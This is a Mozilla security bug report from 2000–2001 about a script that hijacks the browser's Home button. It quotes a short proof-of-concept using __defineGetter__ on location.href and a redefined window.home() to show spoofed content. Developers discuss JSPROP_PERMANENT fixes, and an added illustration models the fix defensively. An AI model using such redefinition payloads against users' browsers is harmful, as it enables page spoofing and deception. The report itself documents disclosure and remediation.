Closed Bug 44014 Opened 24 years ago Closed 23 years ago

spoofing user's "Home"

Categories: Core :: Security, defect, P2
Status: VERIFIED FIXED
Target Milestone: mozilla0.9.1
People: Reporter: security-bugs, Assigned: security-bugs
Whiteboard: [need reviews]
Attachments: 1 file

Date: Mon, 26 Jun 2000 16:48:03 +0300
From: Georgi Guninski <joro@nat.bg>
To: Mitchell Stoltz <mstoltz@netscape.com>

It is possible to change the behavior of clicking the "Home" button or
choosing "Go|Home" from the menu.
The exploit uses __defineGetter__ and redefinition of window.home().
I think that allowing redefinition of predefined functions is not a good
idea.

The code is:
---------------------------------------
Press the "Home" button or choose "Go|Home" in the other window in 2
seconds.
<SCRIPT>
a=window.open("about:blank","a");
function f()
{
a.location.__defineGetter__("href",function() {return "http://www.yahoo.com"});
a.window.home=new Function("this.document.body.innerHTML='Spoofed'");
a.window.home();
}
setTimeout("f()",2000);
</SCRIPT>
---------------------------------------
This testcase does not behave as described, but the vulnerabilities mentioned
should be addressed.
Status: NEW → ASSIGNED
Can't duplicate this exploit, marking M18 for post-Beta2. Re-address this exploit 
and look at the issue of redefining properties.
Target Milestone: --- → M18
Fixing 36946 by marking key properties as PERMANENT will fix this too. As for 
__defineGetter__, this should be fixed now, I think.
Depends on: 36946
I think this no longer works, marking nsbeta3 to remind myself to look at it.
Keywords: nsbeta3
Priority: P3 → P2
Nominating for RTM, and I have opened bug 54976 on the __defineGetter__ aspect
of this bug. Patrick, can you give me a + ?
Keywords: rtm
I've posted jst's patch which adds JSPROP_PERMANENT to the location property.
This doesn't completely fix the problem. Looks like we have to protect
location.href as well.
Mitch, are you happy with the patch in this bug?  Can it go to reviews?  (Is it
OK to strcmp against "LOCATION" vs "location" or using strcasecmp?)  The fix is
reasonably small.  If you think it's correct, it _might_ get approved for RTM...
Whiteboard: [need reviews]
This patch is not a complete fix. We need to restrict "location.href" as well.
I'll see about getting this done.
QA Contact: czhang → junruh
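Added illustration, not part of this bug or of Mozilla's code: a plain-object model of the window/location shape the patch discussion is about, showing what changes when `location`, `location.href` and `home` are defined non-configurable (the ECMAScript analogue of JSPROP_PERMANENT) and why locking `location` alone leaves `href` exposed. The names `makeWindow`, `isPermanent`, `checkRedefinitionBlocked` and the home URL are constructed for the example.

```javascript
"use strict";

// Toy stand-in for the browser window in the report: a `location` object with an
// `href`, and a `home()` method that navigates to the home page. Constructed for
// this illustration; it is not Mozilla's DOM code. `locked` selects whether the
// three properties are defined non-configurable (and, for the two that script
// should never reassign, non-writable), the ES analogue of JSPROP_PERMANENT.
function makeWindow(locked) {
  const HOME_URL = "http://home.example/"; // constructed placeholder
  const win = {};
  const location = {};

  // href stays writable either way: ordinary navigation assigns to it. What
  // `locked` removes is the ability to replace its descriptor with a getter.
  Object.defineProperty(location, "href", {
    value: "about:blank",
    writable: true,
    enumerable: true,
    configurable: !locked,
  });
  Object.defineProperty(win, "location", {
    value: location,
    writable: !locked,
    enumerable: true,
    configurable: !locked,
  });
  Object.defineProperty(win, "home", {
    value: function home() {
      this.location.href = HOME_URL;
      return this.location.href;
    },
    writable: !locked,
    enumerable: false,
    configurable: !locked,
  });
  return win;
}

// True when a property is permanent in the JSPROP_PERMANENT sense: its descriptor
// can no longer be deleted or redefined, so __defineGetter__ on it must fail.
function isPermanent(obj, name) {
  const desc = Object.getOwnPropertyDescriptor(obj, name);
  return desc !== undefined && desc.configurable === false;
}

// Regression check for the fix: replay the two redefinitions the report describes
// (a getter on location.href, reassignment of home) and record what actually took
// effect. Under strict mode each refused write throws, so the errors are recorded
// too instead of failing silently.
function checkRedefinitionBlocked(win) {
  const result = { hrefGetterInstalled: false, homeReplaced: false, errors: [] };
  try {
    win.location.__defineGetter__("href", function () {
      return "http://www.yahoo.com";
    });
  } catch (e) {
    result.errors.push("href: " + e.name);
  }
  result.hrefGetterInstalled = win.location.href === "http://www.yahoo.com";
  try {
    win.home = function () {
      return "Spoofed";
    };
  } catch (e) {
    result.errors.push("home: " + e.name);
  }
  result.homeReplaced = win.home() === "Spoofed";
  return result;
}

// Stand-alone run: compare the two models.
console.log("unlocked:", checkRedefinitionBlocked(makeWindow(false)));
console.log("locked:  ", checkRedefinitionBlocked(makeWindow(true)));
```

In the locked model both writes fail with a TypeError and `home()` still navigates, because `href` keeps `writable: true`; only its descriptor is frozen. Making `location` itself non-configurable does nothing for `href`, which is a property of the nested object with its own descriptor, which is the gap the comment above points at. Note that `configurable: false` is one-way: once a property is locked it cannot be unlocked by any script, so the set of locked properties has to be chosen up front.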
Future, since the fix is not ready yet.
Target Milestone: M18 → Future
Keywords: rtm
removing rtm.
Mass changing QA to ckritzer.
QA Contact: junruh → ckritzer
Mass changing milestones to Moz0.9.1. Many of these bugs are dependent on the
XPConnected DOM and its associated security UI changes.
Target Milestone: Future → mozilla0.9.1
Georgi thinks this is no longer an issue. You can still redefine window.home()
but this doesn't change the behavior of the Home button anymore. There are a few
other bugs dealing with redefining built-in properties, but that's covered
elsewhere, so I'm closing this one.
Status: ASSIGNED → RESOLVED
Closed: 23 years ago
Resolution: --- → FIXED
Marking VERIFIED FIXED per originator on:
-MacOS91 2001-05-21-15-trunk
-Win98SE 2001-05-22-06-trunk
-LinRH62 2001-05-22-05-trunk
Status: RESOLVED → VERIFIED
Removing NS_Confidential flag.
Group: netscapeconfidential?